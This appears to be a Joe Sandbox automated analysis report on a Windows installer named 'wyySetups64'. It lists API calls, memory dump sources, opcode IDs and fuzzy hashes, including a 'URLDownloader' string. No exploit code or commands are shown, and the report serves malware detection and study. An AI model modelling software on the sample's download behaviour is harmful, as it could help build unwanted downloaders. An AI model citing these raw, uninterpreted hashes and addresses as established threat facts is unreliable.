                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00D519BF
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 00D519CE
                                                                                                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D519F5
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00D51A03
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00D51A0D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Window$ClassCreateDispatchFolderFreeHandleKnownModulePathRegisterShowTaskTranslate
                                                                                                                                                                                                              • String ID: URLDownloader
                                                                                                                                                                                                              • API String ID: 1820083345-1891997712
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 10010CFE
                                                                                                                                                                                                              • ___scrt_uninitialize_crt.LIBCMT ref: 10010D18
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2442719207-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(10012398), ref: 00D51152
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,100123AC), ref: 00D51164
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,100123C0), ref: 00D51178
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 00D511D4
                                                                                                                                                                                                              • RegisterClassW.USER32(?), ref: 00D511E8
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,100123D8,100123EC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00D5120D
                                                                                                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D51228
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00D51236
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00D51240
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$AddressProc$ClassCreateDispatchHandleLibraryLoadModuleRegisterTranslateWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3658383123-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B4D7
                                                                                                                                                                                                              • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B4E4
                                                                                                                                                                                                              • ?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B4EF
                                                                                                                                                                                                              • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 1000B50B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$?epptr@?$basic_streambuf@Pninc@?$basic_streambuf@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1504536088-3916222277
                                                                                                                                                                                                              • Opcode ID: bf89f8f8861aed1ab7b692ef0b5d7095335db410b563b161b5768633909dd48d
                                                                                                                                                                                                              • Instruction ID: 9fd4f056ea7531655faf49f776dc9014e5164f0190cfa771b6f3da1c1fb63bf9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf89f8f8861aed1ab7b692ef0b5d7095335db410b563b161b5768633909dd48d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 085173B5D00609EFEB05CFD4C885EEEBBB5EF04381F048199E901A7259DB35AE44CBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B042
                                                                                                                                                                                                              • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B04F
                                                                                                                                                                                                              • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B05A
                                                                                                                                                                                                              • ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 1000B067
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@Gninc@?$basic_streambuf@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 623893373-0
                                                                                                                                                                                                              • Opcode ID: 686d5d765f072bde6da808c523b0d64b58909c4bdd405a7af84071ee35900531
                                                                                                                                                                                                              • Instruction ID: 8fa48943700a81e2c9b2cfce0a1ddd9ba30b149aeda4daa259b851e8e9bcb32b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 686d5d765f072bde6da808c523b0d64b58909c4bdd405a7af84071ee35900531
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE7138B5C0061DDFEB15DFA4C995AEEB7B5FF08290F104229E416B7299EB306E04CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z.MSVCP140(?,?,00000000), ref: 1000AEE8
                                                                                                                                                                                                              • ?_Gnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 1000AF08
                                                                                                                                                                                                              • _Min_value.LIBCPMTD ref: 1000AF1F
                                                                                                                                                                                                              • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 1000AF33
                                                                                                                                                                                                              • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 1000AF5F
                                                                                                                                                                                                              • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000FFF,00000000), ref: 1000AF9D
                                                                                                                                                                                                              • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,00000000), ref: 1000AFEE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@std@@@std@@U?$char_traits@$fread$?gbump@?$basic_streambuf@?gptr@?$basic_streambuf@?xsgetn@?$basic_streambuf@Gnavail@?$basic_streambuf@Min_value
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1591557727-0
                                                                                                                                                                                                              • Opcode ID: 05a9cec6a7bdc9e916f7dfb027493f280f4e908c6d3ff45262789d5ffb131775
                                                                                                                                                                                                              • Instruction ID: a7373feddb38768cb8e80fdeb6ca424b68bff663277300cca749af404b47d492
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05a9cec6a7bdc9e916f7dfb027493f280f4e908c6d3ff45262789d5ffb131775
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1551D8B5E00209EFDB04DFA8C984AEEBBB1FF48344F108169E915A7354D730AE95DB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3353612457-0
                                                                                                                                                                                                              • Opcode ID: 51ffbf4d7ebe4a4557a9ec6990cc1df8eb7d6e0f0daaa4ef435442b776e98115
                                                                                                                                                                                                              • Instruction ID: 64606688521fabd1402afb0874e896261f6c1f2fbb559040e4c03d6bc464acc4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51ffbf4d7ebe4a4557a9ec6990cc1df8eb7d6e0f0daaa4ef435442b776e98115
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0216B76F00269EEDB21CF56DC41AAF3AA9EB80AD4F014919F8945F210C7B0DD918BE0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B35D
                                                                                                                                                                                                              • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B36E
                                                                                                                                                                                                              • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B379
                                                                                                                                                                                                              • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 1000B3A3
                                                                                                                                                                                                              • ?_Gndec@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 1000B3D3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?eback@?$basic_streambuf@Gndec@?$basic_streambuf@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4206206407-0
                                                                                                                                                                                                              • Opcode ID: a80ac29afee63ac313f60e84a30f3a0ede3531dd630a483fc897834597ea8dcd
                                                                                                                                                                                                              • Instruction ID: f7c15c91105892140f05b25e0fcfcadb8d2072b0e91d30d5794a3d544de0fed2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a80ac29afee63ac313f60e84a30f3a0ede3531dd630a483fc897834597ea8dcd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E31CEB9D00208ABEB04DFA4D8959AE7B75EF442C0F04C469F8059B24BEB31EE45CB51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 1000CAC0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,1000BEEA,1000CEAD,1000CEAD,0Gl), ref: 1000CAE4
                                                                                                                                                                                                              • ?good@ios_base@std@@QBE_NXZ.MSVCP140(1000CEAD,1000CEAD), ref: 1000BEFC
                                                                                                                                                                                                              • ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000BF1D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: U?$char_traits@$D@std@@@2@D@std@@@std@@$?good@ios_base@std@@?rdbuf@?$basic_ios@?tie@?$basic_ios@V?$basic_ostream@V?$basic_streambuf@
                                                                                                                                                                                                              • String ID: 0Gl
                                                                                                                                                                                                              • API String ID: 3792166412-169490322
                                                                                                                                                                                                              • Opcode ID: ae12adcc2c32b88dafc5603b844eb9ac3b5d40635a87f722cfffed01479731d9
                                                                                                                                                                                                              • Instruction ID: 6403fa240c7e006dd5772fa615f9af8d9caa538eb968de4636cddec1bc8cd2ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae12adcc2c32b88dafc5603b844eb9ac3b5d40635a87f722cfffed01479731d9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF216D7460064AEFD704CF54C984BAEBBB1FF49344F14C269E8165B391C730E940CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z.MSVCP140(?,?,?), ref: 1000ADB1
                                                                                                                                                                                                              • ?_Pnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 1000ADCB
                                                                                                                                                                                                              • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(00000000,?), ref: 1000AE1C
                                                                                                                                                                                                              • ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 1000AE4D
                                                                                                                                                                                                              • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 1000AE7C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?pbump@?$basic_streambuf@?pptr@?$basic_streambuf@?xsputn@?$basic_streambuf@Pnavail@?$basic_streambuf@fwrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1074265955-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,00000000), ref: 10004037
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 10004074
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 10004091
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 100040A9
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 100040D7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide$memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1216362210-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: dllmain_raw$Main@12
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2964726511-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000152C,00001000,?,10003C5D,00001000), ref: 100107DD
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000152C,00001000,?,10003C5D,00001000), ref: 100107EA
                                                                                                                                                                                                              • _CxxThrowException.VCRUNTIME140(?,10014F2C), ref: 10010EED
                                                                                                                                                                                                              • stdext::threads::lock_error::lock_error.LIBCPMTD ref: 10010EFC
                                                                                                                                                                                                              • _CxxThrowException.VCRUNTIME140(?,10014F90), ref: 10010F0A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionThrow$_callnewhmallocstdext::threads::lock_error::lock_error
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1722040371-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(100172D4,URLDownloader,?,100017A9,100176B8,?,?,?,?,?,?,100019DB,10017674,00C40000,80000000,80000000), ref: 1001072A
                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(100172D4,?,100017A9,100176B8,?,?,?,?,?,?,100019DB,10017674,00C40000,80000000,80000000,00000190), ref: 1001075D
                                                                                                                                                                                                              • WakeAllConditionVariable.KERNEL32(100172D0,?,100017A9,100176B8,?,?,?,?,?,?,100019DB,10017674,00C40000,80000000,80000000,00000190), ref: 10010768
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                                                                                                                                                                              • String ID: URLDownloader
                                                                                                                                                                                                              • API String ID: 1466638765-1891997712
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00D5FF47: NdrClientCall2.RPCRT4 ref: 00D5FF66
                                                                                                                                                                                                              • CoTaskMemFree.COMBASE(00000000), ref: 00D5F16C
                                                                                                                                                                                                              • CoTaskMemFree.COMBASE(00000000), ref: 00D5F179
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeTask$Call2Client
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3085621743-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00D5400E
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 00D54068
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00D54080
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 00D540CC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 626452242-0
                                                                                                                                                                                                              • Opcode ID: 34b2c7f5b494ccf67b9d325744f33ca0ea89d0e807b565f945f2959b528e33de
                                                                                                                                                                                                              • Instruction ID: f85d1b46330a92312850b2d81c1e69c5def5b655719cfb05bfa8aece77c397e1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34b2c7f5b494ccf67b9d325744f33ca0ea89d0e807b565f945f2959b528e33de
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE3134B5E40204BFEB14DFD8CC86FAEB7B5EB48710F244254F615AB2C1D671AA10CB65
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,10011CF6,000000FF,?,1000CB92,?), ref: 1000D350
                                                                                                                                                                                                              • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,10011CF6,000000FF,?,1000CB92), ref: 1000D36B
                                                                                                                                                                                                              • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,1000CB92,?), ref: 1000D39F
                                                                                                                                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP140(?), ref: 1000D417
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getcat@?$codecvt@Mbstatet@@@std@@V42@@Vfacet@locale@2@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1566052064-0
                                                                                                                                                                                                              • Opcode ID: 2c848dbf772fb136aa0b1a4503c2d55199b9e41e15513577ea7fb89fc6818d4e
